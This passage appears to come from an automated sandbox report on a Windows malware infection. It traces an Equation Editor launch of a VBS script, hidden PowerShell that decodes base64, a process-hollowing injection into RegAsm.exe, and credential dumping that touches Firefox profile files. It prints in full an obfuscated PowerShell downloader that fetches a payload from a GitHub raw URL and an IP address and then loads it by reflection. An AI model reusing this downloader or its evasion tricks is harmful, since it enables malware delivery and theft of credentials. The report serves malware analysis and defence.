Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 13_2_0041A7D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1009
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1845
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6054
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_13-53641
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3764 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3948 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 6054 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 1620 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 920 Thread sleep count: 234 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 920 Thread sleep time: -117000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744 Thread sleep count: 127 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744 Thread sleep time: -381000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2448 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744 Thread sleep count: 9351 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744 Thread sleep time: -28053000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2036 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3188 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_0040928E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 13_2_0041C322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 13_2_0040C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_004096A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 13_2_00408847
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00407877 FindFirstFileW,FindNextFileW, 13_2_00407877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0044E8F9 FindFirstFileExA, 13_2_0044E8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 13_2_0040BB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 13_2_00419B86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 13_2_0040BD72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 13_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10006580 FindFirstFileExA, 13_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 18_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 13_2_00407CD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00418981 memset,GetSystemInfo, 16_2_00418981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00434A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 13_2_0041CBE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00443355 mov eax, dword ptr fs:[00000030h] 13_2_00443355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10004AB4 mov eax, dword ptr fs:[00000030h] 13_2_10004AB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 13_2_00411D39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00434BD8 SetUnhandledExceptionFilter, 13_2_00434BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0043503C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00434A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_0043BB71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 13_2_0041812A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 13_2_00412132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00419662 mouse_event, 13_2_00419662
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/n'+'odetecto'+'n/'+'n'+'odete'+'c'+'ton/'+'r'+'efs'+'/heads/ma'+'in/'+'deta'+'hnoth-'+'v.t'+'xt{1}; {2}base'+'64content = (new-ob'+'ject system'+'.'+'net.w'+'ebclient).do'+'wnloadstri'+'ng({2}url);'+' {2'+'}binar'+'ycontent = [system.'+'conve'+'rt]::fr'+'omba'+'se64s'+'t'+'ring({2}base64conte'+'nt); {2}assembly = '+'[refle'+'ctio'+'n.assembly]::l'+'oad({2'+'}bi'+'na'+'r'+'yc'+'onte'+'nt); ['+'dnl'+'ib.'+'io.'+'hom'+'e]::'+'v'+'ai'+'('+'{0}tx'+'t.c'+'fdr'+'rw/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'regas'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [char]34,[char]39,[char]36))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/n'+'odetecto'+'n/'+'n'+'odete'+'c'+'ton/'+'r'+'efs'+'/heads/ma'+'in/'+'deta'+'hnoth-'+'v.t'+'xt{1}; {2}base'+'64content = (new-ob'+'ject system'+'.'+'net.w'+'ebclient).do'+'wnloadstri'+'ng({2}url);'+' {2'+'}binar'+'ycontent = [system.'+'conve'+'rt]::fr'+'omba'+'se64s'+'t'+'ring({2}base64conte'+'nt); {2}assembly = '+'[refle'+'ctio'+'n.assembly]::l'+'oad({2'+'}bi'+'na'+'r'+'yc'+'onte'+'nt); ['+'dnl'+'ib.'+'io.'+'hom'+'e]::'+'v'+'ai'+'('+'{0}tx'+'t.c'+'fdr'+'rw/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'regas'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [char]34,[char]39,[char]36))"Jump to behavior
                  Source: RegAsm.exe, 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrometibility Mode] - Microsoft Word
                  Source: RegAsm.exe, 0000000D.00000002.953097614.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8I\
                  Source: RegAsm.exe, 0000000D.00000002.953097614.000000000088D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: RegAsm.exe, 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434CB6 cpuid 13_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,13_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,13_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
